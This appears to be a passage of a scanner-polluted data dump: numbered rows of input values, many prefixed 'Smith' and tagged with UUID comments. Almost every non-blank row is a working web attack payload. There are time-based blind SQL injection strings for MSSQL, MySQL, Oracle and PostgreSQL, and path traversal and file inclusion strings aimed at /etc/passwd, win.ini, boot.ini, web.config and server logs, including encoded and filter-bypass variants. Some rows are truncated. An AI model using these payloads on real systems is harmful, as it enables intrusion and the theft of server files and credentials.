9480 1);DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(51)+char(48);WAITFOR/
9481 1);DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(51)+char(48);WAITFOR/
9482 Smith 1;DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x-- /* e25c99f1-fe58-4a9a-bacb-b15e3540b121 */
9483 syscolumns WHERE 2>3;DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)
9484 syscolumns WHERE 2>3;DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(49)
9485 syscolumns WHERE 2>3;DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(49)
9486 syscolumns WHERE 2>3;DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(51)
9487 syscolumns WHERE 2>3;DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(51)
9488 1);DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x-- /* 54f49fbb-5455-4fc7-aa32-f23069cb48ff */
9489
9490 syscolumns WHERE 2>3;DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)
9491 syscolumns WHERE 2>3;DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(49)
9492 syscolumns WHERE 2>3;DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(49)
9493 syscolumns WHERE 2>3;DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(51)
9494 syscolumns WHERE 2>3;DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(51)
9495 syscolumns WHERE 2>3;DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(51)
9496 Smith 1);DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x-- /* 47485268-aef6-4891-86b9-55b6e6492894 */
9497 1 + ((SELECT 1 FROM (SELECT SLEEP(25))A))/*'XOR(((SELECT 1 FROM (SELECT SLEEP(25))A)))OR'|"XOR(((SEL
9498 Smith
9499
9500 Smith
9501
9502 syscolumns WHERE 2>3;DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x-- /* ac49f41a-fa0d-48e6-9cca-945f987c547c */
9503 1 + ((SELECT 1 FROM (SELECT SLEEP(25))A))/*'XOR(((SELECT 1 FROM (SELECT SLEEP(25))A)))OR'|"XOR(((SEL
9504 Smith syscolumns WHERE 2>3;DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x-- /* 869501e4-a631-48d2-830e-58f38f14fee4 */
9505 Smith syscolumns WHERE 2>3;DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(49);WAITFOR/**/DELAY/**/@x-- /* a6109497-1dd0-454d-a91d-838cfcde2cae */
9506 Smith syscolumns WHERE 2>3;DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(49);WAITFOR/**/DELAY/**/@x-- /* 85f6e825-bd42-4497-9337-ba30146978b6 */
9507 Smith syscolumns WHERE 2>3;DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(51)+char(48);WAITFOR/**/DELAY/**/@x-- /* a47977ce-909a-472b-81eb-d7623bcedcc0 */
9508 Smith syscolumns WHERE 2>3;DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(51)+char(48);WAITFOR/**/DELAY/**/@x-- /* 66458b40-ca21-43cf-8841-62558394d903 */
9509 -1 AND ((SELECT 1 FROM (SELECT 2)a WHERE 1=sleep(25)))-- 1 /* de2bd1e6-87d3-4f91-83df-cb9c5cfabf3e *
9510 -1 AND ((SELECT 1 FROM (SELECT 2)a WHERE 1=sleep(1)))-- 1 /* ef288a4d-2857-4fa5-9005-1aa7091e5d19 */
9511 -1 AND ((SELECT 1 FROM (SELECT 2)a WHERE 1=sleep(1)))-- 1 /* 563addfc-b09f-4b5d-a62d-8ec0aa4f967c */
9512 + ((SELECT 1 FROM (SELECT SLEEP(25))A))/*'XOR(((SELECT 1 FROM (SELECT SLEEP(25))A)))OR'|"XOR(((SELECT 1 FROM (SELECT SLEEP(25))A)))OR"*/ /* 5c0cb7be-8517-4493-8f01-340e869092f6 */
9513 Smith
9514 Smith + ((SELECT 1 FROM (SELECT SLEEP(25))A))/*'XOR(((SELECT 1 FROM (SELECT SLEEP(25))A)))OR'|"XOR(((SELECT 1 FROM (SELECT SLEEP(25))A)))OR"*/ /* 0c53a29c-605b-4895-b036-07434b3cfd01 */
9515 -1 AND ((SELECT 1 FROM (SELECT 2)a WHERE 1=sleep(25)))-- 1 /* dcca94bf-b3a4-4e6a-a81a-c79bdd93720a *
9516 -1 AND ((SELECT 1 FROM (SELECT 2)a WHERE 1=sleep(25)))-- 1 /* 8c3296b6-e514-447a-bc26-acc80c80ebfb */
9517
9518 ((select sleep(25)))a-- 1 /* 2e0330e7-aa3d-4305-ae19-6de1978017e3 */
9519 Smith
9520 ((select sleep(25)))a-- 1 /* da08e46d-785d-40b8-b19f-9545c5bd5e0f */
9521 Smith -1 AND ((SELECT 1 FROM (SELECT 2)a WHERE 1=sleep(25)))-- 1 /* 834d3d28-cc4a-416e-b1e2-0333771055e9 */
9522 (select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)|
9523 Smith -1 AND ((SELECT 1 FROM (SELECT 2)a WHERE 1=sleep(1)))-- 1 /* 8d1a4ea7-bd72-4b06-a104-ba3c9f19902a */
9524 Smith -1 AND ((SELECT 1 FROM (SELECT 2)a WHERE 1=sleep(1)))-- 1 /* 94e4a587-da36-4bbc-bf73-b33fa41a8345 */
9525 /../../../../../../../../../../boot.ini
9526 ((select sleep(25)))a-- 1 /* a24d7b96-468f-421a-a237-2612a983c2f5 */
9527 Smith /../../../../../../../../../../boot.ini
9528 /../../../../../../../../../../boot.ini.php
9529 Smith ((select sleep(25)))a-- 1 /* b4025d9a-739a-46b6-9dc1-880f4fb018e5 */
9530 (select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)),25) from dual) /* f2df70b0-3651-4131-a3c7-a62b266170e8 */
9531 Smith /../../../../../../../../../../boot.ini.php
9532 /../../../../../../../../../../boot.ini
9533 Smith (select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)),25) from dual) /* 667981f3-e4f0-4903-bda3-f065dfb00389 */
9534 (select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)|
9535 1' || (select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)),25) from dual) || ' /* 9d6879a1-3378-4b5b-8b77-db56d2a2b514 */
9536 1' || (select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)),1) from dual) || ' /* 3823e7a4-d5b1-48c2-b6d5-36544822dd0d */
9537 1' || (select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)),1) from dual) || ' /* cde61f0e-30e8-4d78-ac34-d0bb85aa2c72 */
9538 1' || (select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr
9539 1' || (select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)),30) from dual) || ' /* 4b6cb6df-d03f-440b-8031-e9ee4ef7849c */
9540 1' || (select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)),30) from dual) || ' /* b48fe683-4dab-48d7-9dfc-7652a8ab5af5 */
9541 1' || (select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr
9542 1' || (select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr
9543 1' || (select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr
9544 1' || (select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr
9545 1' || (select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr
9546 Smith 1' || (select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)),25) from dual) || ' /* e005f0a3-9f50-449f-860b-318d2533b7db */
9547 Smith /../../../../../../../../../../boot.ini
9548 Smith 1' || (select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)),1) from dual) || ' /* adb2f11e-2cb0-44c2-b7ca-f23f699c7c70 */
9549 Smith 1' || (select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)),1) from dual) || ' /* ad4ff5e7-897f-4b38-914c-ee216bdc99b6 */
9550 Smith 1' || (select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)),30) from dual) || ' /* a74d4758-3235-490f-8b9d-ee4c78a88c10 */
9551 Smith 1' || (select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)),30) from dual) || ' /* 110638aa-1fb1-47eb-bdfc-d03b9c6b19f8 */
9552 1 + (select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(1
9553 1 + (select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(1
9554 1 + (select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)),25) from dual) + 1 /* 99af5c07-61e9-4479-a567-0712f6bfa593 */
9555 1';SELECT pg_sleep(25)-- /* 051f4c2e-0942-47ad-bf86-319a41f0864c */
9556 file:///boot.ini
9557 1';SELECT pg_sleep(25)-- /* 07f5febe-e6d4-4253-aa2a-898609c0f66c */
9558 Smith 1 + (select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)),25) from dual) + 1 /* f172d93a-cfa7-4953-8bc2-cfd479348c0d */
9559 1;SELECT pg_sleep(25)-- /* d8312649-e148-43a0-bea3-0c1b15c34d1b */
9560 Smith file:///boot.ini
9561 1;SELECT pg_sleep(25)-- /* 4cf62122-9a7c-4925-869a-7030d9d56c23 */
9562 ';SELECT pg_sleep(25)-- /* c5b71ff5-225f-4958-b27c-be1c694268ba */
9563 SELECT pg_sleep(25)-- /* 62c6b7f2-2341-4733-86b8-e7c265cb3eb0 */
9564 SELECT pg_sleep(1)-- /* db63c742-d69b-4dab-8752-324c290bfd1d */
9565 SELECT pg_sleep(1)-- /* f95954a7-458f-47b6-b12c-f82831de68b2 */
9566 Smith ';SELECT pg_sleep(25)-- /* 38cf7522-557d-4fc5-9518-4c8af889d929 */
9567 c:\boot.ini
9568 SELECT pg_sleep(25)-- /* 7a8de268-ca64-4fb1-8036-5d0db0fb8fa2 */
9569 ;SELECT pg_sleep(25)-- /* 7e79f987-0082-4239-ab38-7f18f64afb7e */
9570 ;SELECT pg_sleep(1)-- /* 4e489896-279e-482d-ac0b-62c45b5e01ca */
9571 ;SELECT pg_sleep(1)-- /* 1eb0837a-ce01-411e-871f-ee1dd7e23726 */
9572 ;SELECT pg_sleep(30)-- /* 416106c3-2cb0-4948-8417-e41357d654c8 */
9573 ;SELECT pg_sleep(30)-- /* f0e0f8fd-a709-4cc4-8496-5d39c490ce1f */
9574 1);SELECT pg_sleep(25)-- /* 1b786c9b-1cb9-4e3d-863d-2899befb10b9 */
9575 Smith ;SELECT pg_sleep(25)-- /* f6eebc35-25a5-47bb-a4ed-cb87fa95db9e */
9576 Smith c:\boot.ini
9577 1);SELECT pg_sleep(25)-- /* c6abc928-bda1-4bea-a1d8-6febbcbdc588 */
9578 SELECT pg_sleep(25)-- /* d9f8f05c-a8dd-4d1e-89eb-2f71fcc5bb59 */
9579 ns../../../../../../../../../../../boot.ini.......................................................................................................................................................................................
9580 Smith SELECT pg_sleep(25)-- /* 08a0e6b5-17dd-4d66-97c8-d438ed12e3ef */
9581 1');SELECT pg_sleep(25)-- /* 39f10d24-4166-4292-b2b7-1b51e0aa74f3 */
9582 );SELECT pg_sleep(25)-- /* 2e891fbd-e23d-4a65-9c16-cbe810c5be49 */
9583 Smith ns../../../../../../../../../../../boot.ini.......................................................................................................................................................................................
9584 Smith );SELECT pg_sleep(25)-- /* a8471b1c-9706-4436-9ea9-d0f5f0f7f4e9 */
9585 1');SELECT pg_sleep(25)-- /* 9cc6982a-7651-43b0-a3d7-d3d81dea0a94 */
9586 Smith );SELECT pg_sleep(1)-- /* 882757e8-cfa3-43dc-aad8-73d29878d906 */
9587 1');SELECT pg_sleep(1)-- /* 2e80325e-e26f-41e9-aaf9-bb4fcff525e6 */
9588 Smith );SELECT pg_sleep(1)-- /* f973b334-78b7-4362-9f75-36cb054f38f8 */
9589 1');SELECT pg_sleep(1)-- /* a7d7c74f-fe99-42b6-94b1-a08775c051c2 */
9590 %2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini
9591 ');SELECT pg_sleep(25)-- /* 5eb62ca3-6d4f-477d-85bd-0f6999ec3d6a */
9592 1'));SELECT pg_sleep(25)-- /* aba58504-77ba-4e53-960c-d5c74ddb7314 */
9593 ');SELECT pg_sleep(1)-- /* 975d4de1-ee32-4349-b796-8afb3f9d73b4 */
9594 ');SELECT pg_sleep(1)-- /* bcb02269-8802-47d1-9a46-0bfa510c29c6 */
9595 Smith %2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini
9596 Smith ');SELECT pg_sleep(25)-- /* 9cf1da00-8c85-44d9-a844-2fe34c1ea8c5 */
9597 1));SELECT pg_sleep(25)-- /* d83eb65e-966a-4433-bcbc-1aa150b050fa */
9598 1));SELECT pg_sleep(1)-- /* 2a90f160-4c03-4584-a85f-89ce86a029e7 */
9599 1));SELECT pg_sleep(1)-- /* da1ed38c-b261-492e-b58c-137b8eeac4d2 */
9600 Smith ');SELECT pg_sleep(1)-- /* 373f095a-f00e-45b3-be19-ec33a8615e3a */
9601 Smith ');SELECT pg_sleep(1)-- /* dedf4888-8940-4bfd-a34a-481d5aa62e0d */
9602 Smith ');SELECT pg_sleep(30)-- /* 9f174a5d-42e4-4bfd-9da2-773f283c2b22 */
9603 Smith ');SELECT pg_sleep(30)-- /* 8cd7a411-0f16-4a6c-8862-b5c824ab4309 */
9604 1));SELECT pg_sleep(25)-- /* 6c26916a-805d-45b7-a614-9ebb1d2b7ffe */
9605 file%3a%2f%2f%2fboot.ini
9606 ((SELECT(1)FROM(SELECT(SLEEP(25)))A)) /* 61e44f6c-b2ea-4620-95cc-e1a0518cd74b */
9607 c%3a%5cboot.ini
9608 '));SELECT pg_sleep(25)-- /* 7393f981-0758-4d95-b8ad-3a7aa5a86b1f */
9609 Smith c%3a%5cboot.ini
9610 ((SELECT(1)FROM(SELECT(SLEEP(25)))A)) /* 090533b9-f254-4c86-9ae4-bfdca49aa5e5 */
9611 ((SELECT(1)FROM(SELECT(SLEEP(1)))A)) /* 0b9addb3-db35-4793-88c7-dab0b718cf14 */
9612 ((SELECT(1)FROM(SELECT(SLEEP(1)))A)) /* 0e74efbc-f7ec-4cdd-9def-a9b2690bb53e */
9613 ((SELECT(1)FROM(SELECT(SLEEP(30)))A)) /* ca17caa6-ee59-4dd4-8869-a6587af88e01 */
9614 ((SELECT(1)FROM(SELECT(SLEEP(30)))A)) /* 2360317f-99f0-4cf8-a1da-c452d38d2edb */
9615 Smith '));SELECT pg_sleep(25)-- /* 851148b8-aace-4c45-ae62-380cb0773b39 */
9616 '+((SELECT 1 FROM (SELECT SLEEP(25))A))+' /* 96711fc3-e9f0-4907-9ac0-c7c3eae9a8d2 */
9617 ));SELECT pg_sleep(25)-- /* df13aca7-caea-4763-bbd3-a2dcae01324a */
9618 ));SELECT pg_sleep(1)-- /* 46041429-1510-4dea-b183-8b0bce402bfb */
9619 ));SELECT pg_sleep(1)-- /* 0f693875-a8e1-431d-9dde-8e902d0e2ef4 */
9620 ));SELECT pg_sleep(30)-- /* 979c98d1-e766-48b6-9fc9-ab859b22cf9f */
9621 ));SELECT pg_sleep(1)-- /* 0f693875-a8e1-431d-9dde-8e902d0e2ef4 */
9622 ));SELECT pg_sleep(30)-- /* 48879228-ec89-437f-8534-d717ef8c48ea */
9623 /../../../../../../../../../../web.config
9624 '+((SELECT 1 FROM (SELECT SLEEP(25))A))+' /* 990e5e65-bea7-4364-8de2-d6b4dbfccdc6 */
9625 Smith ));SELECT pg_sleep(25)-- /* f5050c23-02b8-4e3f-9799-cb6e3809a7bd */
9626 '+((SELECT 1 FROM (SELECT SLEEP(1))A))+' /* c93d7e37-ca9a-449c-9b11-fb3aa2deb2dd */
9627 '+((SELECT 1 FROM (SELECT SLEEP(1))A))+' /* 8b77789c-875d-4b91-8a6f-01747d5941cb */
9628 Smith /../../../../../../../../../../web.config
9629 -1' or 1=((SELECT 1 FROM (SELECT SLEEP(25))A))+' /* 2984ddf4-a481-429b-a514-14f78adf0d13 */
9630 ((SELECT(1)FROM(SELECT(SLEEP(25)))A)) /* 440f58db-e650-4153-b616-65014d4b3dee */
9631 ((SELECT(1)FROM(SELECT(SLEEP(1)))A)) /* b12c3a5c-eca2-40b0-bab5-cdfdcc41f626 */
9632 ((SELECT(1)FROM(SELECT(SLEEP(1)))A)) /* 66dc3f72-5e90-4161-8899-5f082ad8f1e3 */
9633 -1' or 1=((SELECT 1 FROM (SELECT SLEEP(25))A))+' /* f176419e-e191-448c-8150-aca120c1e634 */
9634 -1' or 1=((SELECT 1 FROM (SELECT SLEEP(1))A))+' /* e793c258-0e92-4177-af3a-8097c9900060 */
9635 -1' or 1=((SELECT 1 FROM (SELECT SLEEP(1))A))+' /* 062ad345-578f-4eaf-9b69-864fd9b43bfe */
9636 -1' or 1=((SELECT 1 FROM (SELECT SLEEP(30))A))+' /* c595b598-3faa-4e70-922e-9e7799fc24a9 */
9637 -1' or 1=((SELECT 1 FROM (SELECT SLEEP(30))A))+' /* 86366484-e6e3-4c03-9e3f-0d60245dbb6c */
9638 Smith ((SELECT(1)FROM(SELECT(SLEEP(25)))A)) /* b5620efe-eb4b-45e2-be56-34f11d3d382e */
9639 Smith ((SELECT(1)FROM(SELECT(SLEEP(1)))A)) /* 7710f529-cabf-4677-ab5f-7ecd59908699 */
9640 Smith ((SELECT(1)FROM(SELECT(SLEEP(1)))A)) /* c0efda51-d7c0-486c-b3e8-8985c6dba94e */
9641 -1 or 1=((SELECT 1 FROM (SELECT SLEEP(25))A)) /* 66133d44-8e7e-4b67-adfe-da7e46689a05 */
9642 /../../../../../../../../../../windows/win.ini
9643 -1 or 1=((SELECT 1 FROM (SELECT SLEEP(25))A)) /* 9d53e9f9-cf34-409a-9307-ce3caa2471c0 */
9644 '+((SELECT 1 FROM (SELECT SLEEP(25))A))+' /* 3e581574-8e7f-48c1-8a8f-2e7d8ac19d42 */
9645 -1" or 1=((SELECT 1 FROM (SELECT SLEEP(25))A))+" /* 80c7bc9e-70c4-417b-989a-3c94df7653ec */
9646 Smith '+((SELECT 1 FROM (SELECT SLEEP(25))A))+' /* a9cec7a3-a802-49bb-8a26-23648b8ae9c5 */
9647 Smith /../../../../../../../../../../windows/win.ini
9648 -1" or 1=((SELECT 1 FROM (SELECT SLEEP(25))A))+" /* 152cb277-1633-4ff2-8864-d7bf0d471d26 */
9649 -1' or 1=((SELECT 1 FROM (SELECT SLEEP(25))A))+' /* da94f382-0a9e-4103-ab8e-d671f443c20e */
9650 ') AND (SELECT 1 FROM (SELECT(SLEEP(25)))A)-- 1 /* 57ebe432-5e35-4cf5-ab65-f9361b607f46 */
9651 file:///windows/win.ini
9652 Smith -1' or 1=((SELECT 1 FROM (SELECT SLEEP(25))A))+' /* 7054709c-155e-49b0-bcb6-2c126c336b87 */
9653 ') AND (SELECT 1 FROM (SELECT(SLEEP(25)))A)-- 1 /* 98e888d1-96b7-4c6b-b30a-15fd72d2866a */
9654 Smith file:///windows/win.ini
9655 ') AND (SELECT 1 FROM (SELECT(SLEEP(1)))A)-- 1 /* 86b1b21a-0402-4247-9f15-3fcad396f676 */
9656 ') AND (SELECT 1 FROM (SELECT(SLEEP(1)))A)-- 1 /* 34da2149-4d43-4f8e-8ba0-70be4528bf65 */
9657 -1 or 1=((SELECT 1 FROM (SELECT SLEEP(25))A)) /* ccc675f9-68e0-4e09-a8bb-1daa43a734dd */
9658 c:\windows\win.ini
9659 -1 or 1=((SELECT 1 FROM (SELECT SLEEP(1))A)) /* 0ec15c88-b4d5-4994-90ca-7e5ca257eace */
9660 -1 or 1=((SELECT 1 FROM (SELECT SLEEP(1))A)) /* 417b7e33-5b94-4bfd-82c0-4cb1cf22ac29 */
9661 ...//...//...//...//...//...//...//...//...//...//...//windows/win.ini
9662 ' AND (SELECT 1 FROM (SELECT(SLEEP(25)))A)-- 1 /* c78ba2fa-0e1d-4a35-89d6-c85cfad150ac */
9663 Smith -1 or 1=((SELECT 1 FROM (SELECT SLEEP(25))A)) /* 59b1cbbd-06d5-4e59-bbec-2c92c220bd0c */
9664 'XOR(if(now()=sysdate(),sleep(25),0))XOR'NS /* 20417add-1784-4f12-b410-d0a1c2b515ec */
9665 Smith -1 or 1=((SELECT 1 FROM (SELECT SLEEP(1))A)) /* 5fa6b5c4-42ad-4770-b2b7-6ee3a6a138b1 */
9666 'XOR(if(now()=sysdate(),sleep(1),0))XOR'NS /* 7486d8d7-1f7e-4097-894b-e83768a36d58 */
9667 'XOR(if(now()=sysdate(),sleep(1),0))XOR'NS /* 5fc66b43-809f-4e99-a004-bde127fceb78 */
9668 'XOR(if(now()=sysdate(),sleep(30),0))XOR'NS /* cdb5fdce-34db-4758-baa4-8a40acb34515 */
9669 'XOR(if(now()=sysdate(),sleep(30),0))XOR'NS /* 9be1de88-5db0-4b58-987b-ed1d50c0d10b */
9670 Smith ...//...//...//...//...//...//...//...//...//...//...//windows/win.ini
9671 Smith -1 or 1=((SELECT 1 FROM (SELECT SLEEP(1))A)) /* 4d24014a-c9f1-48ac-83ba-c211c4e215d0 */
9672
9673 Smith
9674 -1" or 1=((SELECT 1 FROM (SELECT SLEEP(25))A))+" /* ecf9cdb0-c15c-4d85-8e46-68696186e85e */
9675 Smith
9676 Smith
9677 -1" or 1=((SELECT 1 FROM (SELECT SLEEP(1))A))+" /* 36ddef8f-9145-4a03-9be9-54bd41186528 */
9678 -1" or 1=((SELECT 1 FROM (SELECT SLEEP(1))A))+" /* 487cdf6a-e658-4e9e-904b-d2e809096d77 */
9679
9680 ....//....//....//....//....//....//....//....//....//....//....//windows/win.ini
9681 Smith -1" or 1=((SELECT 1 FROM (SELECT SLEEP(25))A))+" /* 1ba8714f-8632-4e28-9da4-1d246c5f5538 */
9682 Smith ....//....//....//....//....//....//....//....//....//....//....//windows/win.ini
9683 Smith
9684 Smith
9685 Smith
9686 ') AND (SELECT 1 FROM (SELECT(SLEEP(25)))A)-- 1 /* 28ae0450-b4fe-41b8-8a80-7a61550f8c2b */
9687 ') AND (SELECT 1 FROM (SELECT(SLEEP(1)))A)-- 1 /* 78a570b8-8d22-400d-87f5-566b137437f7 */
9688 ') AND (SELECT 1 FROM (SELECT(SLEEP(1)))A)-- 1 /* 49557129-4330-4778-aa79-a2c93d98df58 */
9689 ') AND (SELECT 1 FROM (SELECT(SLEEP(30)))A)-- 1 /* 81db7def-e869-4769-9392-af870e0fdc1d */
9690 ') AND (SELECT 1 FROM (SELECT(SLEEP(30)))A)-- 1 /* a602f12b-5467-4ee0-bbe3-1d579191fdad */
9691
9692
9693 Smith ') AND (SELECT 1 FROM (SELECT(SLEEP(25)))A)-- 1 /* ffc6973d-5b04-4281-b916-4a3aca4b950d */
9694
9695 Smith ') AND (SELECT 1 FROM (SELECT(SLEEP(1)))A)-- 1 /* d9ddf963-afe1-4a30-a75f-4b0f7e490c28 */
9696 Smith ') AND (SELECT 1 FROM (SELECT(SLEEP(1)))A)-- 1 /* 18ee1269-cdff-4793-ae55-e395d63633b7 */
9697 .....///.....///.....///.....///.....///.....///.....///.....///.....///.....///.....///windows/win.ini
9698 Smith
9699 Smith
9700 Smith
9701 Smith
9702 Smith
9703 ' AND (SELECT 1 FROM (SELECT(SLEEP(25)))A)-- 1 /* 3787ce09-ebcf-4790-a24a-0b2f12128d66 */
9704
9705 Smith ' AND (SELECT 1 FROM (SELECT(SLEEP(25)))A)-- 1 /* f4e114e3-7393-499d-a8df-7df81b10842b */
9706 Smith .....///.....///.....///.....///.....///.....///.....///.....///.....///.....///.....///windows/win.ini
9707 Smith
9708 'XOR(if(now()=sysdate(),sleep(25),0))XOR'NS /* 4bfdf9df-84bb-4509-8b84-e4a6a2591ce5 */
9709 'XOR(if(now()=sysdate(),sleep(1),0))XOR'NS /* 71926c62-2c83-4527-a117-431748020d6e */
9710 'XOR(if(now()=sysdate(),sleep(1),0))XOR'NS /* a139351e-d74a-43fa-b89b-a68ece81d2e3 */
9711 'XOR(if(now()=sysdate(),sleep(30),0))XOR'NS /* 1b659cfc-74fb-42ab-ac36-926da5bfb151 */
9712 'XOR(if(now()=sysdate(),sleep(30),0))XOR'NS /* 76823752-4ea2-47bc-ab7b-76faf3aa2818 */
9713
9714
9715
9716 Smith 'XOR(if(now()=sysdate(),sleep(25),0))XOR'NS /* 49d8b145-4d15-4452-920d-e34292839e20 */
9717 . . /. . /. . /. . /. . /. . /. . /. . /. . /. . /. . /windows/win.ini
9718 Smith . . /. . /. . /. . /. . /. . /. . /. . /. . /. . /. . /windows/win.ini
9719 Smith
9720 Smith
9721 Smith
9722 Smith
9723 Smith
9724 /../../../../../../../../../../windows/iis6.log
9725
9726 Smith
9727 Smith
9728 Smith
9729 /../../../../../../../../../../proc/self/fd/2
9730 Smith /../../../../../../../../../../proc/self/fd/2
9731
9732 Smith
9733 /../../../../../../../../../../proc/self/fd/2.php
9734
9735
9736
9737 Smith /../../../../../../../../../../proc/self/fd/2.php
9738 /../../../../../../../../../../etc/httpd/logs/error.log
9739 Smith
9740 Smith
9741 Smith
9742 Smith /../../../../../../../../../../etc/httpd/logs/error.log
9743
9744
9745
9746 /../../../../../../../../../../etc/httpd/logs/error_log
9747 Smith
9748 Smith
9749 Smith
9750 Smith
9751 Smith
9752
9753
9754
9755 Smith /../../../../../../../../../../etc/httpd/logs/error_log
9756 Smith
9757 /../../../../../../../../../../var/log/apache/error.log
9758 Smith /../../../../../../../../../../var/log/apache/error.log
9759 Smith
9760
9761
9762
9763
9764 /../../../../../../../../../../proc/version
9765
9766
9767
9768
9769
9770 Smith /../../../../../../../../../../proc/version
9771
9772 Smith
9773 Smith
9774 Smith
9775 Smith
9776 Smith
9777 /../../../../../../../../../../proc/version.php
9778
9779 Smith /../../../../../../../../../../proc/version.php
9780
9781
9782 /../../../../../../../../../../../etc/passwd
9783 Smith
9784 Smith
9785 Smith /../../../../../../../../../../../etc/passwd
9786 Smith
9787
9788 Smith
9789 /../../../../../../../../../../../etc/passwd
9790
9791 Smith
9792
9793 Smith /../../../../../../../../../../../etc/passwd
9794
9795
9796
9797
9798 file:///etc/passwd
9799 Smith
9800
9801 Smith file:///etc/passwd
9802 Smith
9803 /../../../../../../../../../../../etc/passwd
9804 Smith
9805 Smith
9806 Smith
9807 Smith
9808 Smith
9809 Smith /../../../../../../../../../../../etc/passwd
9810 /../../../../../../../../../../../etc/passwd.php
9811
9812 Smith /../../../../../../../../../../../etc/passwd.php
9813 Smith
9814 ...//...//...//...//...//...//...//...//...//...//...//etc/passwd
9815 Smith
9816 Smith
9817
9818 Smith
9819 Smith ...//...//...//...//...//...//...//...//...//...//...//etc/passwd
9820
9821
9822
9823
9824
9825 ....//....//....//....//....//....//....//....//....//....//....//etc/passwd
9826 Smith
9827
9828 Smith ....//....//....//....//....//....//....//....//....//....//....//etc/passwd
9829
9830
9831
9832 Smith /etc/passwd
9833 Smith
9834 Smith
9835 Smith
